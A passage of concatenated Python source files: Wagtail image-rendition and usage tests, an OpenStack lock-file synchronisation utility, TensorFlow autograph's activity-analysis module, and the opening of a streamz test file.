self.assertTrue(self.image.is_editable_by_user(self.editor))
def test_owner_can_edit(self):
self.assertTrue(self.image.is_editable_by_user(self.owner))
def test_user_cant_edit(self):
self.assertFalse(self.image.is_editable_by_user(self.user))
class TestRenditions(TestCase):
def setUp(self):
# Create an image for running tests on
self.image = Image.objects.create(
title="Test image",
file=get_test_image_file(),
)
def test_minification(self):
rendition = self.image.get_rendition('width-400')
# Check size
self.assertEqual(rendition.width, 400)
self.assertEqual(rendition.height, 300)
def test_resize_to_max(self):
rendition = self.image.get_rendition('max-100x100')
# Check size
self.assertEqual(rendition.width, 100)
self.assertEqual(rendition.height, 75)
def test_resize_to_min(self):
rendition = self.image.get_rendition('min-120x120')
# Check size
self.assertEqual(rendition.width, 160)
self.assertEqual(rendition.height, 120)
def test_resize_to_original(self):
rendition = self.image.get_rendition('original')
# Check size
self.assertEqual(rendition.width, 640)
self.assertEqual(rendition.height, 480)
def test_cache(self):
# Get two renditions with the same filter
first_rendition = self.image.get_rendition('width-400')
second_rendition = self.image.get_rendition('width-400')
# Check that they are the same object
self.assertEqual(first_rendition, second_rendition)
class TestUsageCount(TestCase):
fixtures = ['test.json']
def setUp(self):
self.image = Image.objects.create(
title="Test image",
file=get_test_image_file(),
)
@override_settings(WAGTAIL_USAGE_COUNT_ENABLED=True)
def test_unused_image_usage_count(self):
self.assertEqual(self.image.get_usage().count(), 0)
@override_settings(WAGTAIL_USAGE_COUNT_ENABLED=True)
def test_used_image_document_usage_count(self):
page = EventPage.objects.get(id=4)
event_page_carousel_item = EventPageCarouselItem()
event_page_carousel_item.page = page
event_page_carousel_item.image = self.image
event_page_carousel_item.save()
self.assertEqual(self.image.get_usage().count(), 1)
class TestGetUsage(TestCase):
fixtures = ['test.json']
def setUp(self):
self.image = Image.objects.create(
title="Test image",
file=get_test_image_file(),
)
def test_image_get_usage_not_enabled(self):
self.assertEqual(list(self.image.get_usage()), [])
@override_settings(WAGTAIL_USAGE_COUNT_ENABLED=True)
def test_unused_image_get_usage(self):
self.assertEqual(list(self.image.get_usage()), [])
@override_settings(WAGTAIL_USAGE_COUNT_ENABLED=True)
def test_used_image_document_get_usage(self):
page = EventPage.objects.get(id=4)
event_page_carousel_item = EventPageCarouselItem()
event_page_carousel_item.page = page
event_page_carousel_item.image = self.image
event_page_carousel_item.save()
self.assertTrue(issubclass(Page, type(self.image.get_usage()[0])))
class TestGetWillowImage(TestCase):
fixtures = ['test.json']
def setUp(self):
self.image = Image.objects.create(
title="Test image",
file=get_test_image_file(),
)
def test_willow_image_object_returned(self):
with self.image.get_willow_image() as willow_image:
self.assertIsInstance(willow_image, WillowImage)
def test_with_missing_image(self):
# Image id=1 in test fixtures has a missing image file
bad_image = Image.objects.get(id=1)
# Attempting to get the Willow image for images without files
# should raise a SourceImageIOError
with self.assertRaises(SourceImageIOError):
with bad_image.get_willow_image() as willow_image:
self.fail() # Shouldn't get here
class TestIssue573(TestCase):
"""
This tests for a bug which causes filename limit on Renditions to be reached
when the Image has a long original filename and a big focal point key
"""
def test_issue_573(self):
# Create an image with a big filename and focal point
image = Image.objects.create(
title="Test image",
file=get_test_image_file('thisisaverylongfilename-abcdefghijklmnopqrstuvwxyz-supercalifragilisticexpialidocious.png'),
focal_point_x=1000,
focal_point_y=1000,
focal_point_width=1000,
focal_point_height=1000,
)
# Try creating a rendition from that image
# This would crash if the bug is present
image.get_rendition('fill-800x600')
class TestIssue613(TestCase, WagtailTestUtils):
def get_elasticsearch_backend(self):
from django.conf import settings
from wagtail.wagtailsearch.backends import get_search_backend
backend_path = 'wagtail.wagtailsearch.backends.elasticsearch.ElasticSearch'
# Search WAGTAILSEARCH_BACKENDS for an entry that uses the given backend path
for backend_name, backend_conf in settings.WAGTAILSEARCH_BACKENDS.items():
if backend_conf['BACKEND'] == backend_path:
return get_search_backend(backend_name)
else:
# no conf entry found - skip tests for this backend
raise unittest.SkipTest("No WAGTAILSEARCH_BACKENDS entry for the backend %s" % backend_path)
def setUp(self):
self.search_backend = self.get_elasticsearch_backend()
self.login()
def add_image(self, **params):
post_data = {
'title': "Test image",
'file': SimpleUploadedFile('test.png', get_test_image_file().file.getvalue()),
}
post_data.update(params)
response = self.client.post(reverse('wagtailimages_add_image'), post_data)
# Should redirect back to index
self.assertRedirects(response, reverse('wagtailimages_index'))
# Check that the image was created
images = Image.objects.filter(title="Test image")
self.assertEqual(images.count(), 1)
# Test that size was populated correctly
image = images.first()
self.assertEqual(image.width, 640)
self.assertEqual(image.height, 480)
return image
def edit_image(self, **params):
# Create an image to edit
self.image = Image.objects.create(
title="Test image",
file=get_test_image_file(),
)
# Edit it
post_data = {
'title': "Edited",
}
post_data.update(params)
response = self.client.post(reverse('wagtailimages_edit_image', args=(self.image.id,)), post_data)
# Should redirect back to index
self.assertRedirects(response, reverse('wagtailimages_index'))
# Check that the image was edited
image = Image.objects.get(id=self.image.id)
self.assertEqual(image.title, "Edited")
return image
def test_issue_613_on_add(self):
# Reset the search index
self.search_backend.reset_index()
self.search_backend.add_type(Image)
# Add an image with some tags
image = self.add_image(tags="hello")
self.search_backend.refresh_index()
# Search for it by tag
results = self.search_backend.search("hello", Image)
# Check
self.assertEqual(len(results), 1)
self.assertEqual(results[0].id, image.id)
def test_issue_613_on_edit(self):
# Reset the search index
self.search_backend.reset_index()
self.search_backend.add_type(Image)
# Add an image with some tags
image = self.edit_image(tags="hello")
self.search_backend.refresh_index()
# Search for it by tag
results = self.search_backend.search("hello", Image)
# Check
self.assertEqual(len(results), 1)
self.assertEqual(results[0].id, image.id)
class TestIssue312(TestCase):
def test_duplicate_renditions(self):
# Create an image
image = Image.objects.create(
title="Test image",
file=get_test_image_file(),
)
# Get two renditions and check that they're the same
rend1 = image.get_rendition('fill-100x100')
rend2 = image.get_rendition('fill-100x100')
self.assertEqual(rend1, rend2)
# Now manually duplicate the renditon and check that the database blocks it
self.assertRaises(
IntegrityError,
Rendition.objects.create,
image=rend1.image,
filter=rend1.filter,
width=rend1.width,
height=rend1.height,
focal_point_key=rend1.focal_point_key,
)
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import functools
import os
import shutil
import tempfile
import time
import weakref
from eventlet import semaphore
from quantum.openstack.common import cfg
from quantum.openstack.common import fileutils
from quantum.openstack.common import log as logging
LOG = logging.getLogger(__name__)
util_opts = [
cfg.BoolOpt('disable_process_locking', default=False,
help='Whether to disable inter-process locks'),
cfg.StrOpt('lock_path',
default=os.path.abspath(os.path.join(os.path.dirname(__file__),
'../')),
help='Directory to use for lock files')
]
CONF = cfg.CONF
CONF.register_opts(util_opts)
class _InterProcessLock(object):
"""Lock implementation which allows multiple locks, working around
issues like bugs.debian.org/cgi-bin/bugreport.cgi?bug=632857 and does
not require any cleanup. Since the lock is always held on a file
descriptor rather than outside of the process, the lock gets dropped
automatically if the process crashes, even if __exit__ is not executed.
There are no guarantees regarding usage by multiple green threads in a
single process here. This lock works only between processes. Exclusive
access between local threads should be achieved using the semaphores
in the @synchronized decorator.
Note these locks are released when the descriptor is closed, so it's not
safe to close the file descriptor while another green thread holds the
lock. Just opening and closing the lock file can break synchronisation,
so lock files must be accessed only using this abstraction.
"""
def __init__(self, name):
self.lockfile = None
self.fname = name
def __enter__(self):
self.lockfile = open(self.fname, 'w')
while True:
try:
# Using non-blocking locks since green threads are not
# patched to deal with blocking locking calls.
# Also upon reading the MSDN docs for locking(), it seems
# to have a laughable 10 attempts "blocking" mechanism.
self.trylock()
return self
except IOError, e:
if e.errno in (errno.EACCES, errno.EAGAIN):
# external locks synchronise things like iptables
# updates - give it some time to prevent busy spinning
time.sleep(0.01)
else:
raise
def __exit__(self, exc_type, exc_val, exc_tb):
try:
self.unlock()
self.lockfile.close()
except IOError:
LOG.exception(_("Could not release the acquired lock `%s`"),
self.fname)
def trylock(self):
raise NotImplementedError()
def unlock(self):
raise NotImplementedError()
class _WindowsLock(_InterProcessLock):
def trylock(self):
msvcrt.locking(self.lockfile, msvcrt.LK_NBLCK, 1)
def unlock(self):
msvcrt.locking(self.lockfile, msvcrt.LK_UNLCK, 1)
class _PosixLock(_InterProcessLock):
def trylock(self):
fcntl.lockf(self.lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)
def unlock(self):
fcntl.lockf(self.lockfile, fcntl.LOCK_UN)
if os.name == 'nt':
import msvcrt
InterProcessLock = _WindowsLock
else:
import fcntl
InterProcessLock = _PosixLock
_semaphores = weakref.WeakValueDictionary()
def synchronized(name, lock_file_prefix, external=False, lock_path=None):
"""Synchronization decorator.
Decorating a method like so::
@synchronized('mylock')
def foo(self, *args):
...
ensures that only one thread will execute the bar method at a time.
Different methods can share the same lock::
@synchronized('mylock')
def foo(self, *args):
...
@synchronized('mylock')
def bar(self, *args):
...
This way only one of either foo or bar can be executing at a time.
The lock_file_prefix argument is used to provide lock files on disk with a
meaningful prefix. The prefix should end with a hyphen ('-') if specified.
The external keyword argument denotes whether this lock should work across
multiple processes. This means that if two different workers both run a
a method decorated with @synchronized('mylock', external=True), only one
of them will execute at a time.
The lock_path keyword argument is used to specify a special location for
external lock files to live. If nothing is set, then CONF.lock_path is
used as a default.
"""
def wrap(f):
@functools.wraps(f)
def inner(*args, **kwargs):
# NOTE(soren): If we ever go natively threaded, this will be racy.
# See http://stackoverflow.com/questions/5390569/dyn
# amically-allocating-and-destroying-mutexes
sem = _semaphores.get(name, semaphore.Semaphore())
if name not in _semaphores:
# this check is not racy - we're already holding ref locally
# so GC won't remove the item and there was no IO switch
# (only valid in greenthreads)
_semaphores[name] = sem
with sem:
LOG.debug(_('Got semaphore "%(lock)s" for method '
'"%(method)s"...'), {'lock': name,
'method': f.__name__})
if external and not CONF.disable_process_locking:
LOG.debug(_('Attempting to grab file lock "%(lock)s" for '
'method "%(method)s"...'),
{'lock': name, 'method': f.__name__})
cleanup_dir = False
# We need a copy of lock_path because it is non-local
local_lock_path = lock_path
if not local_lock_path:
local_lock_path = CONF.lock_path
if not local_lock_path:
cleanup_dir = True
local_lock_path = tempfile.mkdtemp()
if not os.path.exists(local_lock_path):
cleanup_dir = True
fileutils.ensure_tree(local_lock_path)
# NOTE(mikal): the lock name cannot contain directory
# separators
safe_name = name.replace(os.sep, '_')
lock_file_name = '%s%s' % (lock_file_prefix, safe_name)
lock_file_path = os.path.join(local_lock_path,
lock_file_name)
try:
lock = InterProcessLock(lock_file_path)
with lock:
LOG.debug(_('Got file lock "%(lock)s" at %(path)s '
'for method "%(method)s"...'),
{'lock': name,
'path': lock_file_path,
'method': f.__name__})
retval = f(*args, **kwargs)
finally:
# NOTE(vish): This removes the tempdir if we needed
# to create one. This is used to cleanup
# the locks left behind by unit tests.
if cleanup_dir:
shutil.rmtree(local_lock_path)
else:
retval = f(*args, **kwargs)
return retval
return inner
return wrap
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Activity analysis.
Requires qualified name annotations (see qual_names.py).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import weakref
import gast
import six
from tensorflow.python.autograph.pyct import anno
from tensorflow.python.autograph.pyct import qual_names
from tensorflow.python.autograph.pyct import transformer
from tensorflow.python.autograph.pyct.static_analysis.annos import NodeAnno
class Scope(object):
"""Encloses local symbol definition and usage information.
This can track for instance whether a symbol is modified in the current scope.
Note that scopes do not necessarily align with Python's scopes. For example,
the body of an if statement may be considered a separate scope.
Caution - the AST references held by this object are weak.
Scope objects are mutable during construction only, and must be frozen using
`Scope.finalize()` before use. Furthermore, a scope is consistent only after
all its children have been frozen. While analysing code blocks, scopes are
being gradually built, from the innermost scope outward. Freezing indicates
that the analysis of a code block is complete. Once frozen, mutation is no
longer allowed. `is_final` tracks whether the scope is frozen or not. Certain
properties, like `referenced`, are only accurate when called on frozen scopes.
Attributes:
parent: Optional[Scope], the parent scope, if any.
isolated: bool, whether the scope is a true Python scope (e.g. the scope of
a function), or just a surrogate tracking an ordinary code block. Using
the terminology of the Python 3 reference documentation, True roughly
represents an actual scope, whereas False represents an ordinary code
block.
isolated_names: Set[qual_names.QN], identifiers that are isolated to this
scope (even if the scope is not isolated).
annotations: Set[qual_names.QN], identifiers used as type annotations
in this scope.
read: Set[qual_names.QN], identifiers read in this scope.
modified: Set[qual_names.QN], identifiers modified in this scope.
deleted: Set[qual_names.QN], identifiers deleted in this scope.
bound: Set[qual_names.QN], names that are bound to this scope. See
https://docs.python.org/3/reference/executionmodel.html#binding-of-names
for a precise definition.
globals: Set[qual_names.QN], names that are explicitly marked as global in
this scope. Note that this doesn't include free read-only vars bound to
global symbols.
free_vars: Set[qual_names.QN], the free variables in this scope. See
https://docs.python.org/3/reference/executionmodel.html for a precise
definition.
params: WeakValueDictionary[qual_names.QN, ast.Node], function arguments
visible in this scope, mapped to the function node that defines them.
enclosing_scope: Scope, the innermost isolated scope that is a transitive
parent of this scope. May be the scope itself.
referenced: Set[qual_names.QN], the totality of the symbols used by this
scope and its parents.
is_final: bool, whether the scope is frozen or not.
Note - simple statements may never delete and modify a symbol at the same
time. However, compound ones like if statements can. In that latter case, it's
undefined whether the symbol is actually modified or deleted upon statement
exit. Certain analyses like reaching definitions need to be careful about
this.
"""
# Note: this mutable-immutable pattern is used because using a builder would
# have taken a lot more boilerplate.
def __init__(self, parent, isolated=True):
"""Create a new scope.
Args:
parent: A Scope or None.
isolated: Whether the scope is isolated, that is, whether variables
modified in this scope should be considered modified in the parent
scope.
"""
self.parent = parent
self.isolated = isolated
self.isolated_names = set()
self.read = set()
self.modified = set()
self.deleted = set()
self.bound = set()
self.globals = set()
self.annotations = set()
self.params = weakref.WeakValueDictionary()
# Certain fields can only be accessed after the scope and all its parent
# scopes have been fully built. This field guards that.
self.is_final = False
@property
def enclosing_scope(self):
assert self.is_final
if self.parent is not None and not self.isolated:
return self.parent
return self
@property
def referenced(self):
if self.parent is not None:
return self.read | self.parent.referenced
return self.read
@property
def free_vars(self):
enclosing_scope = self.enclosing_scope
return enclosing_scope.read - enclosing_scope.bound
def copy_from(self, other):
"""Recursively copies the contents of this scope from another scope."""
assert not self.is_final
if self.parent is not None:
assert other.parent is not None
self.parent.copy_from(other.parent)
self.isolated_names = copy.copy(other.isolated_names)
self.modified = copy.copy(other.modified)
self.read = copy.copy(other.read)
self.deleted = copy.copy(other.deleted)
self.bound = copy.copy(other.bound)
self.annotations = copy.copy(other.annotations)
self.params = copy.copy(other.params)
@classmethod
def copy_of(cls, other):
if other.parent is not None:
assert other.parent is not None
parent = cls.copy_of(other.parent)
else:
parent = None
new_copy = cls(parent)
new_copy.copy_from(other)
return new_copy
def merge_from(self, other):
"""Adds all activity from another scope to this scope."""
assert not self.is_final
if self.parent is not None:
assert other.parent is not None
self.parent.merge_from(other.parent)
self.isolated_names.update(other.isolated_names)
self.read.update(other.read)
self.modified.update(other.modified)
self.bound.update(other.deleted)
self.annotations.update(other.annotations)
self.params.update(other.params)
def finalize(self):
"""Freezes this scope."""
assert not self.is_final
# TODO(mdan): freeze read, modified, bound.
if self.parent is not None:
assert not self.parent.is_final
if not self.isolated:
self.parent.read.update(self.read - self.isolated_names)
self.parent.modified.update(self.modified - self.isolated_names)
self.parent.bound.update(self.bound - self.isolated_names)
self.parent.globals.update(self.globals)
self.parent.annotations.update(self.annotations)
else:
# TODO(mdan): This is not accurate.
self.parent.read.update(self.read - self.bound)
self.parent.annotations.update(self.annotations - self.bound)
self.is_final = True
def __repr__(self):
return 'Scope{r=%s, w=%s}' % (tuple(self.read), tuple(self.modified))
def mark_param(self, name, owner):
# Assumption: all AST nodes have the same life span. This lets us use
# a weak reference to mark the connection between a symbol node and the
# function node whose argument that symbol is.
self.params[name] = owner
class _Comprehension(object):
no_root = True
def __init__(self):
# TODO(mdan): Consider using an enum.
self.is_list_comp = False
self.targets = set()
class _FunctionOrClass(object):
def __init__(self):
self.node = None
class ActivityAnalyzer(transformer.Base):
"""Annotates nodes with local scope information.
See Scope.
The use of this class requires that qual_names.resolve() has been called on
the node. This class will ignore nodes have not been
annotated with their qualified names.
"""
def __init__(self, context, parent_scope=None):
super(ActivityAnalyzer, self).__init__(context)
self.allow_skips = False
self.scope = Scope(parent_scope, isolated=True)
# Note: all these flags crucially rely on the respective nodes are
# leaves in the AST, that is, they cannot contain other statements.
self._in_aug_assign = False
self._in_annotation = False
self._track_annotations_only = False
@property
def _in_constructor(self):
context = self.state[_FunctionOrClass]
if context.level > 2:
innermost = context.stack[-1].node
parent = context.stack[-2].node
return (isinstance(parent, gast.ClassDef) and
(isinstance(innermost, gast.FunctionDef) and
innermost.name == '__init__'))
return False
def _node_sets_self_attribute(self, node):
if anno.hasanno(node, anno.Basic.QN):
qn = anno.getanno(node, anno.Basic.QN)
# TODO(mdan): The 'self' argument is not guaranteed to be called 'self'.
if qn.has_attr and qn.parent.qn == ('self',):
return True
return False
def _track_symbol(self, node, composite_writes_alter_parent=False):
if self._track_annotations_only and not self._in_annotation:
return
# A QN may be missing when we have an attribute (or subscript) on a function
# call. Example: a().b
if not anno.hasanno(node, anno.Basic.QN):
return
qn = anno.getanno(node, anno.Basic.QN)
# When inside a comprehension, ignore reads to any of the comprehensions's
# targets. This includes attributes or slices of those arguments.
for l in self.state[_Comprehension]:
if qn in l.targets:
return
if qn.owner_set & set(l.targets):
return
if isinstance(node.ctx, gast.Store):
# In comprehensions, modified symbols are the comprehension targets.
if self.state[_Comprehension].level > 0:
self.state[_Comprehension].targets.add(qn)
# List comprehension targets leak in Python 2.
# For details, see:
# https://stackoverflow.com/questions/4198906/list-comprehension-rebinds-names-even-after-scope-of-comprehension-is-this-righ
if not (six.PY2 and self.state[_Comprehension].is_list_comp):
return
self.scope.modified.add(qn)
self.scope.bound.add(qn)
if qn.is_composite and composite_writes_alter_parent:
self.scope.modified.add(qn.parent)
if self._in_aug_assign:
self.scope.read.add(qn)
elif isinstance(node.ctx, gast.Load):
self.scope.read.add(qn)
if self._in_annotation:
self.scope.annotations.add(qn)
elif isinstance(node.ctx, gast.Param):
self.scope.bound.add(qn)
self.scope.mark_param(qn, self.state[_FunctionOrClass].node)
elif isinstance(node.ctx, gast.Del):
# The read matches the Python semantics - attempting to delete an
# undefined symbol is illegal.
self.scope.read.add(qn)
# Targets of del are considered bound:
# https://docs.python.org/3/reference/executionmodel.html#binding-of-names
self.scope.bound.add(qn)
self.scope.deleted.add(qn)
else:
raise ValueError('Unknown context {} for node "{}".'.format(
type(node.ctx), qn))
def _enter_scope(self, isolated):
self.scope = Scope(self.scope, isolated=isolated)
def _exit_scope(self):
exited_scope = self.scope
exited_scope.finalize()
self.scope = exited_scope.parent
return exited_scope
def _exit_and_record_scope(self, node, tag=anno.Static.SCOPE):
node_scope = self._exit_scope()
anno.setanno(node, tag, node_scope)
return node_scope
def _process_statement(self, node):
self._enter_scope(False)
node = self.generic_visit(node)
self._exit_and_record_scope(node)
return node
def _process_annotation(self, node):
self._in_annotation = True
node = self.visit(node)
self._in_annotation = False
return node
def visit_Import(self, node):
return self._process_statement(node)
def visit_ImportFrom(self, node):
return self._process_statement(node)
def visit_Global(self, node):
self._enter_scope(False)
for name in node.names:
qn = qual_names.QN(name)
self.scope.read.add(qn)
self.scope.globals.add(qn)
self._exit_and_record_scope(node)
return node
def visit_Nonlocal(self, node):
self._enter_scope(False)
for name in node.names:
qn = qual_names.QN(name)
self.scope.read.add(qn)
self.scope.bound.add(qn)
self._exit_and_record_scope(node)
return node
def visit_Expr(self, node):
return self._process_statement(node)
def visit_Raise(self, node):
return self._process_statement(node)
def visit_Return(self, node):
return self._process_statement(node)
def visit_Assign(self, node):
return self._process_statement(node)
def visit_AnnAssign(self, node):
self._enter_scope(False)
node.target = self.visit(node.target)
node.value = self.visit(node.value)
if node.annotation:
node.annotation = self._process_annotation(node.annotation)
self._exit_and_record_scope(node)
return node
def visit_AugAssign(self, node):
# Special rules for AugAssign. Here, the AST only shows the target as
# written, when it is in fact also read.
self._enter_scope(False)
self._in_aug_assign = True
node.target = self.visit(node.target)
self._in_aug_assign = False
node.op = self.visit(node.op)
node.value = self.visit(node.value)
self._exit_and_record_scope(node)
return node
def visit_Delete(self, node):
return self._process_statement(node)
def visit_Name(self, node):
if node.annotation:
node.annotation = self._process_annotation(node.annotation)
self._track_symbol(node)
return node
def visit_alias(self, node):
node = self.generic_visit(node)
if node.asname is None:
# Only the root name is a real symbol operation.
qn = qual_names.QN(node.name.split('.')[0])
else:
qn = qual_names.QN(node.asname)
self.scope.modified.add(qn)
self.scope.bound.add(qn)
return node
def visit_Attribute(self, node):
node = self.generic_visit(node)
if self._in_constructor and self._node_sets_self_attribute(node):
self._track_symbol(node, composite_writes_alter_parent=True)
else:
self._track_symbol(node)
return node
def visit_Subscript(self, node):
node = self.generic_visit(node)
# Subscript writes (e.g. a[b] = "value") are considered to modify
# both the element itself (a[b]) and its parent (a).
self._track_symbol(node)
return node
def visit_Print(self, node):
self._enter_scope(False)
node.values = self.visit_block(node.values)
node_scope = self._exit_and_record_scope(node)
anno.setanno(node, NodeAnno.ARGS_SCOPE, node_scope)
return node
def visit_Assert(self, node):
return self._process_statement(node)
def visit_Call(self, node):
self._enter_scope(False)
node.args = self.visit_block(node.args)
node.keywords = self.visit_block(node.keywords)
# TODO(mdan): Account starargs, kwargs
self._exit_and_record_scope(node, tag=NodeAnno.ARGS_SCOPE)
node.func = self.visit(node.func)
return node
def _process_block_node(self, node, block, scope_name):
self._enter_scope(False)
block = self.visit_block(block)
self._exit_and_record_scope(node, tag=scope_name)
return node
def _process_parallel_blocks(self, parent, children):
# Because the scopes are not isolated, processing any child block
# modifies the parent state causing the other child blocks to be
# processed incorrectly. So we need to checkpoint the parent scope so that
# each child sees the same context.
before_parent = Scope.copy_of(self.scope)
after_children = []
for child, scope_name in children:
self.scope.copy_from(before_parent)
parent = self._process_block_node(parent, child, scope_name)
after_child = Scope.copy_of(self.scope)
after_children.append(after_child)
for after_child in after_children:
self.scope.merge_from(after_child)
return parent
def _process_comprehension(self,
node,
is_list_comp=False,
is_dict_comp=False):
with self.state[_Comprehension] as comprehension_:
comprehension_.is_list_comp = is_list_comp
# Note: it's important to visit the generators first to properly account
# for the variables local to these generators. Example: `x` is local to
# the expression `z for x in y for z in x`.
node.generators = self.visit_block(node.generators)
if is_dict_comp:
node.key = self.visit(node.key)
node.value = self.visit(node.value)
else:
node.elt = self.visit(node.elt)
return node
def visit_comprehension(self, node):
# It is important to visit children in this order so that the reads to
# the target name are appropriately ignored.
node.iter = self.visit(node.iter)
node.target = self.visit(node.target)
return self.generic_visit(node)
def visit_DictComp(self, node):
return self._process_comprehension(node, is_dict_comp=True)
def visit_ListComp(self, node):
return self._process_comprehension(node, is_list_comp=True)
def visit_SetComp(self, node):
return self._process_comprehension(node)
def visit_GeneratorExp(self, node):
return self._process_comprehension(node)
def visit_ClassDef(self, node):
with self.state[_FunctionOrClass] as fn:
fn.node = node
# The ClassDef node itself has a Scope object that tracks the creation
# of its name, along with the usage of any decorator accompanying it.
self._enter_scope(False)
node.decorator_list = self.visit_block(node.decorator_list)
self.scope.modified.add(qual_names.QN(node.name))
self.scope.bound.add(qual_names.QN(node.name))
node.bases = self.visit_block(node.bases)
node.keywords = self.visit_block(node.keywords)
self._exit_and_record_scope(node)
# A separate Scope tracks the actual class definition.
self._enter_scope(True)
node = self.generic_visit(node)
self._exit_scope()
return node
def _visit_node_list(self, nodes):
return [(None if n is None else self.visit(n)) for n in nodes]
def _visit_arg_annotations(self, node):
node.args.kw_defaults = self._visit_node_list(node.args.kw_defaults)
node.args.defaults = self._visit_node_list(node.args.defaults)
self._track_annotations_only = True
node = self._visit_arg_declarations(node)
self._track_annotations_only = False
return node
def _visit_arg_declarations(self, node):
node.args.posonlyargs = self._visit_node_list(node.args.posonlyargs)
node.args.args = self._visit_node_list(node.args.args)
if node.args.vararg is not None:
node.args.vararg = self.visit(node.args.vararg)
node.args.kwonlyargs = self._visit_node_list(node.args.kwonlyargs)
if node.args.kwarg is not None:
node.args.kwarg = self.visit(node.args.kwarg)
return node
def visit_FunctionDef(self, node):
with self.state[_FunctionOrClass] as fn:
fn.node = node
# The FunctionDef node itself has a Scope object that tracks the creation
# of its name, along with the usage of any decorator accompanying it.
self._enter_scope(False)
node.decorator_list = self.visit_block(node.decorator_list)
if node.returns:
node.returns = self._process_annotation(node.returns)
# Argument annotartions (includeing defaults) affect the defining context.
node = self._visit_arg_annotations(node)
function_name = qual_names.QN(node.name)
self.scope.modified.add(function_name)
self.scope.bound.add(function_name)
self._exit_and_record_scope(node)
# A separate Scope tracks the actual function definition.
self._enter_scope(True)
# Keep a separate scope for the arguments node, which is used in the CFG.
self._enter_scope(False)
# Arg declarations only affect the function itself, and have no effect
# in the defining context whatsoever.
node = self._visit_arg_declarations(node)
self._exit_and_record_scope(node.args)
# Track the body separately. This is for compatibility reasons, it may not
# be strictly needed.
self._enter_scope(False)
node.body = self.visit_block(node.body)
self._exit_and_record_scope(node, NodeAnno.BODY_SCOPE)
self._exit_and_record_scope(node, NodeAnno.ARGS_AND_BODY_SCOPE)
return node
def visit_Lambda(self, node):
# Lambda nodes are treated in roughly the same way as FunctionDef nodes.
with self.state[_FunctionOrClass] as fn:
fn.node = node
# The Lambda node itself has a Scope object that tracks the creation
# of its name, along with the usage of any decorator accompanying it.
self._enter_scope(False)
node = self._visit_arg_annotations(node)
self._exit_and_record_scope(node)
# A separate Scope tracks the actual function definition.
self._enter_scope(True)
# Keep a separate scope for the arguments node, which is used in the CFG.
self._enter_scope(False)
node = self._visit_arg_declarations(node)
self._exit_and_record_scope(node.args)
# Track the body separately. This is for compatibility reasons, it may not
# be strictly needed.
# TODO(mdan): Do remove it, it's confusing.
self._enter_scope(False)
node.body = self.visit(node.body)
self._exit_and_record_scope(node, NodeAnno.BODY_SCOPE)
self._exit_and_record_scope(node, NodeAnno.ARGS_AND_BODY_SCOPE)
return node
def visit_With(self, node):
self._enter_scope(False)
node = self.generic_visit(node)
self._exit_and_record_scope(node, NodeAnno.BODY_SCOPE)
return node
def visit_withitem(self, node):
return self._process_statement(node)
def visit_If(self, node):
self._enter_scope(False)
node.test = self.visit(node.test)
node_scope = self._exit_and_record_scope(node.test)
anno.setanno(node, NodeAnno.COND_SCOPE, node_scope)
node = self._process_parallel_blocks(node,
((node.body, NodeAnno.BODY_SCOPE),
(node.orelse, NodeAnno.ORELSE_SCOPE)))
return node
def visit_For(self, node):
self._enter_scope(False)
node.target = self.visit(node.target)
node.iter = self.visit(node.iter)
self._exit_and_record_scope(node.iter)
self._enter_scope(False)
self.visit(node.target)
if anno.hasanno(node, anno.Basic.EXTRA_LOOP_TEST):
self._process_statement(anno.getanno(node, anno.Basic.EXTRA_LOOP_TEST))
self._exit_and_record_scope(node, tag=NodeAnno.ITERATE_SCOPE)
node = self._process_parallel_blocks(node,
((node.body, NodeAnno.BODY_SCOPE),
(node.orelse, NodeAnno.ORELSE_SCOPE)))
return node
def visit_While(self, node):
self._enter_scope(False)
node.test = self.visit(node.test)
node_scope = self._exit_and_record_scope(node.test)
anno.setanno(node, NodeAnno.COND_SCOPE, node_scope)
node = self._process_parallel_blocks(node,
((node.body, NodeAnno.BODY_SCOPE),
(node.orelse, NodeAnno.ORELSE_SCOPE)))
return node
def visit_ExceptHandler(self, node):
self._enter_scope(False)
# try/except oddity: as expected, it leaks any names you defined inside the
# except block, but not the name of the exception variable.
if node.name is not None:
self.scope.isolated_names.add(anno.getanno(node.name, anno.Basic.QN))
node = self.generic_visit(node)
self._exit_scope()
return node
def resolve(node, context, parent_scope=None):
return ActivityAnalyzer(context, parent_scope).visit(node)
| |
from datetime import timedelta
import operator
from operator import add
from time import time
import pytest
from tornado import gen
from tornado.queues import Queue
from tornado.ioloop import IOLoop
import streamz as sz
from ..core import Stream
from streamz.sources import sink_to_file, Counter
from streamz.utils_test import inc, double, gen_test, tmpfile
def test_basic():
source = Stream()
b1 = source.map(inc)
b2 = source.map(double)
c = b1.scan(add)
Lc = c.sink_to_list()
Lb = b2.sink_to_list()
for i in range(4):
source.emit(i)
assert Lc == [1, 3, 6, 10]
assert Lb == [0, 2, 4, 6]
def test_scan():
source = Stream()
def f(acc, i):
acc = acc + i
return acc, acc
L = source.scan(f, returns_state=True).sink_to_list()
for i in range(3):
source.emit(i)
assert L == [0, 1, 3]
def test_filter():
source = Stream()
L = source.filter(lambda x: x % 2 == 0).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [0, 2, 4, 6, 8]
def test_map():
def add(x=0, y=0):
return x + y
source = Stream()
L = source.map(add, y=10).sink_to_list()
source.emit(1)
assert L[0] == 11
def test_map_args():
source = Stream()
L = source.map(operator.add, 10).sink_to_list()
source.emit(1)
assert L == [11]
def test_remove():
source = Stream()
L = source.remove(lambda x: x % 2 == 0).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [1, 3, 5, 7, 9]
def test_partition():
source = Stream()
